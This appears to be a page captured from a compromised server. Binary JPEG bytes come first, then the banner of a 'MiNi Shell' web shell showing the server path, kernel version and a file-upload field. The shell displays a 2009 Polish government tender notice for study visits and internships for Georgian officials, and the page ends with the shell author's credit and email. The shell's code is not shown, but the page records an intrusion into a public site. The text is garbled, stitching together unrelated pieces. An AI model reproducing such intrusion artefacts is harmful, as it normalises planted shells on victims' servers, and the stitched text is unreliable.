JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090720/115923-N-2009.html

<p class="kh_header"><b>Warszawa: Organizacja dwóch wizyt studyjnych i staży w ramach projektu KPRM na rzecz wsparcia Rządu Gruzji we wdrażaniu Strategii Rozwoju Regionalnego.</b><br>
<b>Numer ogłoszenia: 115923 - 2009; data zamieszczenia: 20.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kancelaria Prezesa Rady Ministrów , Al. Ujazdowskie 1/3, 00-583 Warszawa, woj. mazowieckie, tel. 022 6947503, faks 022 6946671.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja dwóch wizyt studyjnych i staży w ramach projektu KPRM na rzecz wsparcia Rządu Gruzji we wdrażaniu Strategii Rozwoju Regionalnego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja dwóch wizyt studyjnych i staży w ramach projektu KPRM na rzecz wsparcia Rządu Gruzji we wdrażaniu Strategii Rozwoju Regionalnego, 
Zamówienie składa się z następujących działań:
1) Przygotowanie i obsługa 4-dniowej wizyty 10 przedstawicieli administracji gruzińskiej w Polsce, w tym:
a)dokonanie rezerwacji i zakupu biletów lotniczych dla dziesięciu uczestników wizyty studyjnej na trasie Tbilisi - Warszawa - Tbilisi,
b)dokonanie rezerwacji i zakupu miejsc noclegowych w Warszawie i w Krakowie, 
c)zapewnienie tłumaczenia podczas wizyty studyjnej w Polsce,
d)zapewnienie tłumaczenia materiałów konferencyjnych na język gruziński i/ lub na język polski,
e)zapewnienie pełnego wyżywienia w trakcie wizyty w Polsce,
f)zapewnienie transportu w trakcie wizyty w Polsce,
g)zorganizowanie uroczystej kolacji,
h)opracowanie i przekazanie sprawozdania z przygotowania i obsługi wizyty studyjnej w Polsce. 
2)Przygotowanie i obsługa 4-tygodniowych staży dla 10 przedstawicieli gruzińskich instytucji publicznych w urzędach administracji publicznej, w tym:
a)dokonanie rezerwacji i zakupu biletów lotniczych dla dziesięciu stażystów na trasie Tbilisi - Warszawa - Tbilisi,
b)zapewnienie transportu na trasie lotnisko Okęcie - hotel - lotnisko Okęcie,
c)dokonanie rezerwacji i zakupu miejsc noclegowych dla stażystów,
d)przekazanie diet stażystom,
e)wyposażenie stażystów w 30-dniowy bilet imienny, 
f)zorganizowanie uroczystej kolacji,
g)opracowanie i przekazanie sprawozdania z przygotowania i obsługi staży.
3)Przygotowanie i obsługa 3-dniowej wizyty studyjnej 3-osobowej polskiej delegacji w Gruzji, w tym:
a)dokonanie rezerwacji i zakupu miejsc noclegowych dla trzech członków delegacji w Gruzji, 
b)zapewnienie przedstawiciela Wykonawcy na każdym etapie realizacji wizyty,
c)zapewnienie tłumaczenia ustnego podczas pobytu delegacji w Gruzji,
d)zapewnienie tłumaczenia materiałów konferencyjnych na język gruziński i lub na język polski,
e)zapewnienie pełnego wyżywienia w trakcie wizyty w Gruzji,
f)zapewnienie transportu w trakcie wizyty w Gruzji,
g)zorganizowanie uroczystej kolacji,
h)opracowanie i przekazanie sprawozdania z przygotowania i obsługi wizyty studyjnej w Gruzji.
Zamówienie realizowane jest w ramach kompleksowego projektu Wsparcie Rządu Gruzji we wdrażaniu Strategii Rozwoju Regionalnego w zakresie decentralizacji i rozwoju zasobów ludzkich, realizowanego przez KPRM w ramach programu polskiej pomocy zagranicznej Ministerstwa Spraw Zagranicznych RP w 2009 r.
Budżet przewidziany na realizację przedmiotowego zamówienia wynosi 194 844,00  złotych brutto.
Zamawiający dopuszcza udział podwykonawców przy realizacji zamówienia.
Wykonawca nie może powierzyć podwykonawcom sprawozdawczości, tj.:
a)opracowania i przekazania sprawozdania z przygotowania i obsługi wizyty studyjnej w Polsce,
b)opracowania i przekazania sprawozdania z przygotowania i obsługi staży,
c)opracowania i przekazania sprawozdania z przygotowania i obsługi wizyty studyjnej w Gruzji.
W przypadku wykonywania części zamówienia przez podwykonawcę Wykonawca wskaże w formularzu ofertowym, stanowiącym załącznik nr 1 do SIWZ, część (części) zamówienia, które powierza podwykonawcy (podwykonawcom)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.99.70.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Oferta zabezpieczona wadium w wysokości 2300 zł (dwa tysiące trzysta złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 pkt. 1-4 Ustawy, tj.: 
1.1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
1.2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,  tj.:
1.2.1. wykonane, a w przypadku świadczeń okresowych lub ciągłych, również wykonywane, w okresie ostatnich 3 (trzech) lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:- 2 (dwa) zamówienia na łączną kwotę 100 000 zł brutto, polegające na organizacji zagranicznych wyjazdów grupowych, gdzie w skład każdego z nich wchodziło zapewnienie uczestnikom minimum: wyżywienia, noclegów i transportu, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, poparte dokumentami potwierdzającymi, że usługi te zostały wykonane należycie, i - 2 (dwa) zamówienia na łączną kwotę 80 000 zł brutto, polegające na organizacji krajowych wyjazdów grupowych, gdzie w skład każdego z nich wchodziło zapewnienie uczestnikom minimum: wyżywienia, noclegów i transportu,
z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, poparte dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.
1.3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
1.4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych poniżej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w pkt. 1.1-1.3 winien spełniać jeden Wykonawca lub Wykonawcy wspólnie, warunek określony w pkt. 1.4 winni spełniać wszyscy Wykonawcy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone w art. 22. ust 1 pkt 1-3 pzp wg wzoru na Zał. nr 2 do SIWZ (oryginał),
2. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 m-cy przed upływem terminu składania ofert, 
UWAGA: Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa w powyższej UWADZE, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Terminy stosuje się odpowiednio.
3. wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych, również wykonywanych, w okresie ostatnich 3 (trzech) lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: - 2 (dwóch) zamówień na łączną kwotę 100 000 zł brutto, polegających na organizacji zagranicznych wyjazdów grupowych, gdzie w skład każdego z nich wchodziło zapewnienie uczestnikom minimum: wyżywienia, noclegów i transportu, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, poparte dokumentami potwierdzającymi, że usługi te zostały wykonane należycie, i - 2 (dwóch) zamówień na łączną kwotę 80 000 zł brutto, polegających na organizacji krajowych wyjazdów grupowych, gdzie w skład każdego z nich wchodziło zapewnienie uczestnikom minimum: wyżywienia, noclegów i transportu, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, poparte dokumentami potwierdzającymi, że usługi te zostały wykonane należycie,
sporządzony zgodnie z Zał. nr 3 do SIWZ. Wykaz musi zawierać informacje niezbędne do stwierdzenia, czy Wykonawca spełnia warunek określony w Sekcji III.2 pkt. 1.2.1. Do wykazu należy załączyć dokumenty potwierdzające, że każda usługa została wykonana należycie.
4. oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 Ustawy wg wzoru z  Zał. nr 2a do SIWZ (oryginał).
5. W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty wymienione w pkt. 2 i 4 mają potwierdzać spełnienie warunku określonego w III.2 pkt 1.4 przez wszystkich Wykonawców. Dokument określony w pkt 3 (wykaz zamówień) oraz oświadczenie z pkt. 1 mają potwierdzać spełnienie warunków określonych w sekcji III.2 pkt 1.1-1.3 przez jednego Wykonawcę lub przez Wykonawców wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.premier.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria Prezesa Rady ministrów, Al. Ujazdowskie 1/3, 00-583 Warszawa..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2009 godzina 13:00, miejsce: Oferty należy przesyłać na adres: Kancelaria Prezesa Rady Ministrów, Al. Ujazdowskie 1/3, 00-583 Warszawa albo złożyć na Dziennik Podawczy (wejście od Al. Szucha 14)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com